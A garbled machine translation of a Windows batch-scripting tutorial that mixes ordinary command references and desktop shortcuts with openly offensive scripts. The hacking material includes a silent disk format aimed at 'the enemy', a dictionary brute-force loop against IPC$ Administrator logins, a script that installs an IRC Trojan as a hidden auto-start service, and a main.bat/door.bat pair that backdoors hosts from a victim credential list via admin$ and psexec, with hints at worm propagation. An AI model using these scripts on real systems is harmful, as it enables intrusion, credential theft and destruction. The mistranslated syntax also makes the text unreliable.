Advanced application skills of batch processing

Time:2021-11-8

Advanced application of batch processing 1
1、 Simple batch internal commands 
Advanced application of batch processing!! Tips!!!  
Batch processing is familiar to everyone!  
Here are some knowledge points about batch processing: 
1: Skillfully use FC command as a Trojan horse checking tool:  
First, create the batch file atm.bat: write the code: @ echo   off  
dir c:\windows\system32\*.exe >c:??.txt 
dir c:\windows\system32\*.dll >c:??.txt 
2: Create a batch file wlts.bat   Write code: @ echo   off  
dir c:\windows\system32\*.dll >c:\findexe.txt 
dir c:\windows\system32\*.exe >c:\finddll.txt 
fc c:??.txt c:\findexe.txt >c:\exe.txt 
fc c:??.txt c:\finddll.txt >c:\dll.txt 
In this way, first run atm.bat on your machine  
In the future, when you suspect a Trojan horse, run wlts.bat   Then go to C: \ exe.txt   and   Dll.txt look, you can see the suspicious file!   This is just an idea!!   You can also use it to clear the garbage files left when you uninstall the software! Like in the registry!  
2: Use the subst command to make a hard drive!  
example  
subst x: c:?? 
Where x is the drive letter   111 create a folder for the drive  
3: Clever use of subst command to hide 3.5 drive  
subst   h:   c:\atm   And make the ATM folder read-only!  
Restore: at start – run – subst   a:  / d   OK!!  
1.Echo   command 
Turns echo on or off request echo, or displays a message. If there are no parameters, echo   The command displays the current echo settings.  
grammar  
echo [{on|off}] [message] 
Sample:@echo off / echo hello world 
In practical application, we will combine this command with the redirection symbol (also known as pipe symbol, which is generally used as >  >> ^) This will be reflected in future examples.  
[email protected]   command  
It means that the commands behind @ are not displayed. During the intrusion process (for example, using batch processing to format the enemy’s hard disk), the other party can’t see the commands you use.  
Sample:@echo off 
@echo Now initializing the program,please wait a minite… 
@format   X:  / q/u/autoset   (format   This command cannot use the / Y parameter. Fortunately, Microsoft left an AUTOSET parameter for us, and the effect is the same as / y.)  
3.Goto   command 
Specifies to jump to the label. When the label is found, the program will process the command starting from the next line.  
Syntax: goto   label   (label is a parameter that specifies the row in the batch program to be redirected.)  
Sample: 
if {%1}=={} goto noparms 
if   {%2}=={}   goto   Noparms (if you don’t understand the if,% 1,% 2 here, skip to it first, and there will be a detailed explanation later.)  
@Rem check parameters if null show usage 
:noparms 
echo Usage: monitor.bat ServerIP PortNumber 
goto end 
The name of the tag can be used casually, but it’s better to use a meaningful letter. Add a: before the letter to indicate that the letter is a tag. The goto command is based on this: to find the next step and jump there. You’d better have some explanations so that others will seem to understand your intention.  
4.Rem   command  
The comment command is equivalent to / * ——— * / Inc language. It will not be executed, but only serves as a comment for others to read and modify in the future.  
Rem Message 
Sample:@Rem Here is the description. 
5.Pause   command  
function   Pause   Command, the following message is displayed:  
Press any key to continue . . . 
Sample: 
@echo off 
:begin 
copy a:*.* d:\back 
echo Please put a new disk into driver A 
pause 
goto begin 
In this example, the drive   A   All files on the disk in are copied to D: \ back. The note that appears prompts you to put another disk in the drive   A   Pause   The command suspends the program so that you can replace the disk, and then press any key to continue processing.  
6.Call   command 
Calls from one batch program to another without terminating the parent batch program. call   Command accepts the label used as the call target. If used outside a script or batch file   Call, which will not work on the command line.  
grammar  
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 
parameter  
[Drive:}[Path] FileName 
Specify the location and name of the batch program to call. filename   Parameter must have  . bat   or  . cmd   Extension.  
7.start   command 
Call external programs. All DOS commands and command-line programs can be called by the start command.  
Common intrusion parameters:  
MIN   Minimize window at start  
SEPARATE   Start in a separate space   sixteen   position   Windows   program  
HIGH   stay   HIGH   Priority category start application  
REALTIME   stay   REALTIME   Priority category start application  
WAIT   Start the application and wait for it to finish  
parameters   These are the parameters passed to the command / program  
The application executed is   32-bit   GUI   Application, cmd.exe   Return to the command prompt before the application terminates. If executed within a command script, the new behavior does not occur.  
8.choice   command 
choice   This command allows the user to enter a character to run different commands. The / C: parameter should be added when using, and the characters prompted for input should be written after C: without spaces. Its return code is 1234  
For example:   choice  / cme   defrag,mem,end  
Will show  
defrag,mem,end[D,M,E]? 
Sample: 
The contents of sample.bat are as follows:  
@echo off 
choice /cme defrag,mem,end 
if   errorlevel   three   goto   defrag   (the error code with the highest value shall be judged first)  
if errorlevel 2 goto mem 
if errotlevel 1 goto end 
efrag 
c:\dos\defrag 
goto end 
:mem 
mem 
goto end 
:end 
echo good bye 
After this file is run, the   defrag,mem,end[D,M,E]?   User selectable D   m   e  , Then the if statement will make a judgment. D represents the execution of the program segment labeled defrag, M represents the execution of the program segment labeled MEM, and e represents the execution of the program segment labeled end. Each program segment is finally marked with goto   End jumps the program to the end label, and then the program will display good   Bye, end of file.

Advanced application of batch processing 2
3、 How to use the compound command   Command)  
1.& 
Usage: first command  &  Second order   [&   Third order…]  
In this way, multiple commands can be executed at the same time, regardless of whether the command is executed successfully or not  
Sample: 
C:\>dir z: & dir c:\Ex4rch 
The system cannot find the path specified. 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 
Directory of c:\Ex4rch 
2002-05-14 23:51 <DIR> . 
2002-05-14 23:51 <DIR> .. 
2002-05-14 23:51 14 sometips.gif 
2.&& 
Usage: first command  &&  Second order   [&&   Third order…]  
In this way, multiple commands can be executed at the same time. When an error command is encountered, the following commands will not be executed. If there is no error, all commands will be executed all the time;  
Sample: 
C:\>dir z: && dir c:\Ex4rch 
The system cannot find the path specified. 
C:\>dir c:\Ex4rch && dir z: 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 
Directory of c:\Ex4rch 
2002-05-14 23:55 <DIR> . 
2002-05-14 23:55 <DIR> .. 
2002-05-14 23:55 14 sometips.gif 
1 File(s) 14 bytes 
2 Dir(s) 768,671,744 bytes free 
The system cannot find the path specified. 
This command may be used during backup, which is relatively simple, such as:  
dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:\backup 
If the backup.mdb file exists on the remote server, execute the copy command. If the file does not exist, do not execute the copy command. This usage can replace if   Exist  :)  3.||  
Usage: first command  ||  Second order   [||   Third order…]  
In this way, multiple commands can be executed at the same time. When the correct command is executed, the following commands will not be executed. If the correct command does not appear, all commands will be executed all the time;  
Sample: 
C:\Ex4rch>dir sometips.gif || del sometips.gif 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 
Directory of C:\Ex4rch 
2002-05-14 23:55 14 sometips.gif 
1 File(s) 14 bytes 
0 Dir(s) 768,696,320 bytes free 
Examples of combined commands:  
sample: 
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt 
No.4 
4、 Use of pipeline commands 
1.|   command  
Usage: first command  |  Second order   [|   Third order…]  
Use the result of the first command as an argument to the second command. Remember that this method is very common in UNIX.  
sample: 
time /t>>D:\IP.log 
netstat -n -p tcp|find “:3389”>>D:\IP.log 
start Explorer 
See? For terminal services, it allows us to customize the starting program for users to run the following bat to obtain the IP of the logged in user.  
2. >, > > output redirection commands  
Redirect the output of a command or a program to a specific file,  >  And  >> The difference is that > > will clear the contents of the original file and write to the specified file, while > > will only append the contents to the specified file without changing the contents.  
sample1: 
echo hello world>c:\hello.txt (stupid example?) 
sample2: 
Nowadays, DLL Trojans are popular. We know that system32 is a good place to play hide and seek. Many Trojans have sharpened their heads and drilled there, and DLL Trojans are no exception. In view of this, we can make a record of exe and DLL files in this directory after installing the system and necessary applications:  
Run CMD — convert directory to system32 — dir  *. exe>exeback.txt  &  dir  *. dll>dllback.txt,  
In this way, the names of all exe and DLL files are recorded in exeback.txt and dlback.txt respectively,  
In the future, if you find an exception but can’t find the problem by traditional methods, you should consider whether the DLL Trojan horse has sneaked into the system  
At this time, we use the same command to record the EXE and DLL files under system32 into another exeback1.txt and dllback1.txt, and then run:  
CMD–fc   exeback.txt   exeback1.txt>diff.txt  &  fc   dllback.txt   Dllback1. TXT > diff.txt. (use the FC command to compare the DLL and exe files before and after two times, and input the results into diff.txt). In this way, we can find some extra DLL and exe files, and then we can easily judge whether they have been patronized by the DLL Trojan horse by checking the creation time, version and whether they have been compressed. No is the best. If any, don’t del directly. Use Regsvr32 first  / u   Trojan.dll log out the backdoor DLL file, and then move it to the recycle bin. If there is no abnormal response from the system, delete it completely or submit it to the anti-virus software company.  
3.< 、>& 、<& 
<   Read command input from a file instead of from the keyboard.  
>&   Writes the output of one handle to the input of another handle.  
<&   Reads input from one handle and writes it to the output of another handle.  
These are not commonly used, so I won’t introduce them more.  
No.5 
5、 How to use batch file * as registry 
In the process of intrusion, it is often used as the specific key value of the registry to achieve certain purposes. For example, in order to hide the backdoor and Trojan horse programs, delete the residual key value under run. Or create a service to load the back door. Of course, we will also modify the registry to strengthen the system or change a property of the system, which requires us to have a certain understanding of the registry *. Now let’s learn how to use. Reg file * as registry. (we can generate a reg file by batch processing)  
About the * operation of the registry, the common ones are creation, modification and deletion.  
1. Create  
There are two kinds of creation: one is to create a subkey  
We create a file that reads as follows:  
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker] 
Then execute the script and you are already in HKEY_ LOCAL_ A child named “hacker” was created under machine \ software \ Microsoft.  
The other is to create a project name  
This file format is a typical file format, which is consistent with the file format exported from the registry. The contents are as follows:  
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
“Invader”=”Ex4rch” 
“Door”=C:\\WINNT\\system32\\door.exe 
“Autodos”=dword:02 
This is done under [hkey_local_machine \ software \ Microsoft \ windows \ CurrentVersion \ run]  
Three new projects are created: invader, door and about  
The type of invader is “string”   value”  
The type of door is “reg”   SZ   value”  
The type of autodos is “DWORD”   value”  
2. Modification  
Modification is relatively simple. Just export the items you need to modify, modify them with Notepad, and then import (regedit  / s) Just.  
3. Delete  
Let’s first talk about deleting a project name. We create a file as follows:  
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
“Ex4rch”=- 
Execute the script, and the “ex4rch” under [hkey_local_machine \ software \ Microsoft \ windows \ CurrentVersion \ run] will be deleted;  
Let’s take another look at deleting a sub item. We create a script as follows:  
Windows Registry Editor Version 5.00 
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
After executing the script, [hkey_local_machine \ software \ Microsoft \ windows \ CurrentVersion \ run] has been deleted.  
I believe you have basically mastered the. Reg file. So the goal now is to create. Reg files with specific content by batch. Remember that we said earlier that using redirection symbols can easily create specific types of files.  
Samlpe1: as in the above example, if you want to generate the following registry file  
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
“Invader”=”Ex4rch” 
“door”=hex:255 
“Autodos”=dword:000000128 
Just do this:  
@echo Windows Registry Editor Version 5.00>>Sample.reg 
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg 
@echo “Invader”=”Ex4rch”>>Sample.reg 
@echo “door”=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg 
@echo “Autodos”=dword:02>>Sample.reg 
samlpe2: 
When using some older Trojans, we may generate a key value under [hkey_local_machine \ software \ Microsoft \ windows \ CurrentVersion \ run (RunOnce, runservices, runexec)] in the registry to realize the Trojan’s self startup. However, it is easy to expose the path of the Trojan program, resulting in the Trojan being killed, In contrast, it is relatively safe to register the Trojan horse as a system service. The following takes the configured IRC Trojan horse dsnx as an example (named windrv32. Exe)  
@start windrv32.exe 
@attrib +h +r windrv32.exe 
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll 
@echo “windsnx “=- >>patch.dll 
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe 
@regedit /s patch.dll 
@delete patch.dll 
@REM   [delete the startup key of dsnxde in the registry, register it as a system critical service with sc.exe, set its properties to hidden and read-only, and config to self startup]  
@REM   It’s not safer ^ ^  
Some good skills! (it can be called a classic) 
1. If multiple windows are open at the same time and you want to close them, press and hold shift, and then click the right window   The close icon in the upper corner  
2. Before saving the web page, you can press the “ESC” key (or work offline) and save it again, so that it can be saved quickly  
3. You can listen to a CD with a computer without any playing software. Connect the speaker cable directly to the headphone hole of the optical drive and put it in   CD, press the play key on the CD drive to listen directly, so that listening to songs does not occupy system resources. (e.g   If your computer is broken and can’t be started or something, put it there for a while and can’t be repaired. Don’t waste resources  , Power up the CD drive with the power inside, and you can make a CD player temporarily  
4. Press enter when sending a message in MSN. If you want to wrap a line without sending a message, you can   Shift + enter or Ctrl + ENTER  
5. Short HTML code can be debugged in the address bar of the browser. The method is as follows:   Address bar write   about  : abc   Enter and you’ll see the effect  
6. Windows shortcut:  
win+m   Display desktop  
win+pause   System properties  
Quick restart: press shift before pressing OK (not applicable to 2K, XP)  
Completely delete Shift + Del  
Do not let the disc run automatically: press shift  
CTRL + ESC: equivalent to start or win  
CTRL + home: move the cursor to the beginning of the text editing area (home: move to the top of the column)  
CTRL + end: move the cursor to the end of the text editing area (end: move to the end of the column)  
Alt + F4: close the current window (if you click the desktop and press again, it will be shut down)  
F2: change name  
windows+e   Resource manager  
windows+r   function.  
windows+f   Find  
windows+u   Turn off the system  
Windows + D minimizes all windows. Press Win + D again to return to the window before minimization  
Windows + m minimizes all windows, but pressing it again cannot return to the window before minimization  
Shift + F10 to open the right-click menu of the selected item  
Press and hold   CTRL+SHIFT   Drag files: creating shortcuts  
7. Shutdown shortcut  
(1).   Press the right mouse button in an empty position on the desktop  -> < New >  ->  Select < shortcut >  
(2).   Type in < command line >   rundll.exe   user.exe,exitwindows  
(3).   Select shortcut in   Type < close window > or the name you want  ->  Press < to finish  > 
8. Restart shortcut  
(1).   Repeat above   (1)  
(2).   Type in < command line >   rundll.exe   user.exe,exitwindow***ec  
(3).   In < select the name of the shortcut >, type < restart > or the name you want  ->  Press<   Done >  
9.RUN  – >  cmd   Or command  
You will see the DOS window. I don’t know if you have noticed the small icon in the upper left corner.  
Click this icon,   You will see the drop-down menu,   Especially some functions under edit,   Very convenient  
10. Con and nul are reserved names of MS system. They cannot be used as file names! Check if your web space is m$   System, you can build a con folder to try  
11. Want to make a list of files in one of your folders?   What software do you use?   No, directly on the command   Enter under line   “tree  / f  >  Index.txt “. Open index.txt to see if it is clear at a glance  
12. To save the borderless window page, please use Ctrl + n to open a new window  

Advanced application of batch processing 3
9.If   command  
if   Indicates that it will judge whether the specified conditions are met, so as to decide to execute different commands.   There are three formats:  
1、if   “Parameters”  ==  “String”   Commands to be executed  
If the parameter is equal to the specified string, the condition is true, run the command, otherwise run the next sentence. (note the two equal signs)  
Such as if   “%1″==”a”   format   a:  
if {%1}=={} goto noparms 
if {%2}=={} goto noparms 
2、if   exist   File name   Commands to be executed  
If there is a specified file, the condition is true, run the command, otherwise run the next sentence.  
Such as if   exist   config.sys   edit   config.sys  
3、if   errorlevel  /  if   not   errorlevel   Number   Commands to be executed  
If the return code is equal to the specified number, the condition is true, run the command, otherwise run the next sentence.  
Such as if   errorlevel   two   goto   x2      
When DOS program runs, it will return a number to DOS, which is called error code errorlevel or return code. The common return codes are 0 and 1.   10.for   command  
for   Command is a complex command, which is mainly used to execute the command circularly within the specified range of parameters.  
Use in batch files   FOR   To specify a variable, use the  %% variable  
for {%variable|%%variable} in (set) do command [ CommandLineOptions] 
%variable   Specify a single letter replaceable parameter.  
(set)   Specify a file or group of files. Wildcards can be used.  
command   Specifies the command to execute for each file.  
command-parameters   Specify parameters or command line switches for a specific command.  
Use in batch files   FOR   To specify a variable, use the  %% variable  
Instead of using  % variable。 Variable names are case sensitive, so  % i   differ  % I  
If the command extension is enabled, the following additional   FOR   The command format is affected  
support:  
FOR /D %variable IN (set) DO command [command-parameters] 
If the set contains wildcards, the specified matches the directory name, not the file name  
Name match.  
FOR /R [[drive:]path] %variable IN (set) DO command [command- 
Check to   [drive:]path   Is the root directory tree, pointing to the directory in each directory  
FOR   sentence. If in  / R   If no directory is specified, the current directory is used  
catalogue If the set is only a single dot (.) character, enumerate the directory tree.  
FOR /L %variable IN (start,step,end) DO command [command-para 
This set represents a sequence of numbers in increments from start to end.  
Therefore, (1,1,5)   The sequence will be generated   one   two   three   four   5,(5,-1,1)   Will produce  
sequence   (5   four   three   two   1)。  
FOR /F [“options”] %variable IN (file-set) DO command 
FOR /F [“options”] %variable IN (“string”) DO command 
FOR /F [“options”] %variable IN (command) DO command 
Or, if so   usebackq   Options:  
FOR /F [“options”] %variable IN (file-set) DO command 
FOR /F [“options”] %variable IN (“string”) DO command 
FOR /F [“options”] %variable IN (command) DO command 
filenameset   Is one or more file names. Continue to   filenameset   Medium  
Each file is opened, read, and processed before the next file.  
Processing involves reading the file, dividing it into lines of text, and then dividing each line  
Resolve to zero or more symbols. Then use the found symbolic string variable value  
call   For   Cycle. By default, / F   Separated by each line of each file  
The first blank symbol of the. Skip blank lines. You can specify an optional   “options”  
Parameter overrides the default resolution *. The quoted string includes one or more  
Specify keywords for different parsing options. These keywords are:  
eol=c  –  Refers to the end of a line comment character (just one)  
skip=n  –  Refers to the number of lines ignored at the beginning of the file.  
delims=xxx  –  Refers to the separator set. This replaces spaces and tabs  
Default separator set.  
tokens=x,y,m-n  –  It refers to which symbol of each line is passed to each iteration  
of   for   Itself. This results in additional variable names  
The format is a range. adopt   nth   Symbol assignment   m  
The asterisk of the last character in the symbol string,  
Then the additional variables will be resolved in the last symbol  
Assign and accept reserved text for the line.  
usebackq  –  The specified new syntax has been used in the following cases:  
Execute a string with a back quote as a command, and  
Quote characters are text string commands and are allowed in   fi  
Use double quotation marks in to expand the file name.  
sample1: 
FOR /F “eol=; tokens=2,3* delims=, ” %i in (myfile.txt) do command 
Will analyze   myfile.txt   For each line in the, ignoring those lines that begin with semicolons, the  
The second and third symbols in each line are passed to the   for   Program body; Use commas and / or  
Space delimitation symbol. Please note that this   for   Statement reference of program body  % i   come  
Get the second symbol, reference  % j   To get the third symbol, reference  % k  
To get all the remaining symbols after the third symbol. For files with spaces  
Name, you need to enclose the file name in double quotes. In order to make  
With double quotes, you also need to use   usebackq   Option, otherwise, double quotes will  
It is understood to be used to define a string to be analyzed.  
%i   Specifically in   for   Statement,% J   and  % k   Yes  
tokens=   Options are specifically described. You can   tokens=   a line  
Specify maximum   twenty-six   A symbol, as long as it does not try to explain a higher than a letter   z   or  
Z   Variable. Remember, for   Variables are single letter, case sensitive and global;  
At the same time, there must be no   fifty-two   More than are in use.  
You can also use on adjacent strings   FOR  / F   Analysis logic; The way is,  
Use single quotation marks to enclose the text between parentheses   filenameset   Wrap it up. In this way, the character  
The string is treated as a single input line in a file.  
Finally, you can use   FOR  / F   Command to analyze the output of the command. The method is to  
Between parentheses   filenameset   Becomes an inverted string. The string will  
Is passed as a command line to a child   Cmd.exe, its output will be caught in  
Memory and is analyzed as a file. Therefore, the following examples:  
FOR /F “usebackq delims==” %i IN (`set`) DO @echo %i 
Enumerates the names of environment variables in the current environment.  
In addition, for   Substitution of variable references has been enhanced. You can now use the following  
Option syntax:  
~I  –  Remove any quotation marks (“) and expand  % I  
%~fI  –  take  % I   Expand to a fully qualified pathname  
%~dI  –  Will only  % I   Expand to one drive letter  
%~pI  –  Will only  % I   Expand to one path  
%~nI  –  Will only  % I   Expand to a file name  
%~xI  –  Will only  % I   Expand to a file extension  
%~sI  –  The extended path contains only short names  
%~aI  –  take  % I   File properties extended to files  
%~tI  –  take  % I   Date / time extended to file  
%~zI  –  take  % I   Expand to file size  
%~$PATH:I  –  Find the directory listed in the path environment variable and  % I   expansion  
To the first fully qualified name found. If the environment variable  
This key combination will be expanded if it is not defined or the file is not found  
Empty string  
You can combine modifiers to get multiple results:  
%~dpI  –  Will only  % I   Expand to a drive letter and path  
%~nxI  –  Will only  % I   Expand to a file name and extension  
%~fsI  –  Will only  % I   Expand to a full pathname with a short name  
%~dp$PATH:i  –  Find the directory listed in the path environment variable and  % I   expansion  
To the first drive letter and path found.  
%~ftzaI  –  take  % I   Extended to similar output lines   DIR  
In the above example,% I   and   PATH   Other valid values may be used instead.%~   grammar  
With a valid   FOR   Variable name terminated. Select similar  % I   Uppercase variable name  
Easy to read and avoid confusion with case insensitive key combinations.  
The above is the official help of Ms. let’s give several examples to illustrate the use of the for command in intrusion.  
sample2: 
Use the for command to crack the violent password of a target Win2K host.  
We use net   use  \\ ip\ipc$   “password”  / u: “Administrator” to try to connect with the target host, and write down the password when successful.  
The main command is one: for  / f   i%   in   (dict.txt)   do   net   use  \\ ip\ipc$   “i%”  / u:”administrator”  
Use I% to represent the password of admin. In dict.txt, take the value of I% and use net   use   Command to connect. Then pass the program running result to the find command –  
for  / f   i%%   in   (dict.txt)   do   net   use  \\ ip\ipc$   “i%%”  / u:”administrator”|find   “: command completed successfully” > > D: \ ok.txt  , That’s Ko it.  
sample3: 
Have you ever had a lot of broilers waiting for you to plant a back door + Trojan horse?, When the number is very large, the originally happy thing will become very depressed:). At the beginning of the article, we talked about using batch files to simplify daily or repetitive tasks. So how to achieve it? Hehe, you’ll see.  
There is only one main command: (used in batch files)   FOR   When using the command, specify a variable  %% variable)  
@for /f “tokens=1,2,3 delims= ” %%i in (victim.txt) do start call door.bat %%i %%j %%k 
For the usage of tokens, see sample1 above. Here, it means to pass the contents in victim.txt to the parameter% I in door.bat in order  % j  % k。  
Culture.bat is nothing more than net   Use command to establish IPC $connection, copy Trojan + back door to victim, and then use return code (if   errorlever  =) To filter the host that successfully planted the backdoor and echo it out, or echo to the specified file.  
delims=   Indicates that the content in vivtim.txt is separated by a space. I think you must understand the content of victim.txt. Should be based on%% I  %% j  %% K represents the object, which is generally   ip   password   username。  
Code prototype:  
————— cut here then save as a batchfile(I call it main.bat ) ————————— 
@echo off 
@if “%1″==”” goto usage 
@for /f “tokens=1,2,3 delims= ” %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k 
@goto end 
:usage 
@echo run this batch in dos modle.or just double-click it. 
:end 
————— cut here then save as a batchfile(I call it main.bat ) ————————— 
——————- cut here then save as a batchfile(I call it door.bat) —————————– 
@net use \\%1\ipc$ %3 /u:”%2″ 
@if errorlevel 1 goto failed 
@echo Trying to establish the IPC$ connection …………OK 
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt 
@psexec \\%1 c:\winnt\system32\windrv32.exe 
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt 
:failed 
@echo Sorry can not connected to the victim. 
—————– cut here then save as a batchfile(I call it door.bat) ——————————– 
This is just the prototype of automatic planting backdoor batch processing. There are two batches and backdoor programs (windrv32. Exe). Psexec.exe needs to be placed in a unified directory. Batch processing content  
It can also be expanded, for example, by adding the function of clearing logs + DDoS and adding users regularly, which can make it have the function of automatic propagation (worm). There is no more description here, and interested friends can study it by themselves  
—————————— 
2:No.2 
2、 How to use parameters in batch files 
Parameters can be used in batch processing, generally from 1% to   9%. When there are multiple parameters, we need to use shift to move. This is rare, so we won’t consider it.  
sample1:fomat.bat 
@echo off 
if “%1″==”a” format a: 
:format 
@format a:/q/u/auotset 
@echo please insert another disk to driver A. 
@pause 
@goto fomat 
This example is used to format several floppy disks continuously, so you need to enter fomat.bat in the DOS window   a. Hehe, it seems that it’s a little superfluous ~^_^  
sample2: 
When we want to establish an IPC $connection, we always have to enter a large series of commands. If we don’t get it right, we’ll get the wrong number, so we might as well write some fixed commands into a batch and put the IP address of the broiler   password   username   Assign this batch with parameters, so you don’t have to type commands every time.  
@echo off 
@net   use  \Ι%\ ipc$   “2%”  / u:”3%”   Note that password here is the second parameter.  
@if errorlevel 1 echo connection failed 
How about using parameters? Is it relatively simple? You must have learned to be so handsome